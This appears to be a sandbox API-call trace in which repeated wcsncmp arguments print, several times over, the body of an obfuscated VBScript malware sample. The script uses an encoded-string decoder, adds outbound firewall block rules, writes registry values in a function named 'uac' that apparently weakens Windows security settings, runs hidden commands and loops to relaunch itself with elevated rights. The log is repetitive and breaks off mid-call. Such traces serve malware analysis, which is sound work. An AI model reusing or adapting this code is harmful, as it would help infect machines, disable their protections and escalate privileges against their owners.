1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 54 [0226.373] wcsncmp (_String1="V\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 73 [0226.373] wcsncmp (_String1="\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 21 [0226.373] wcsncmp (_String1=") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 28 [0226.374] wcsncmp (_String1=" & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 19 [0226.374] wcsncmp (_String1="& str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", 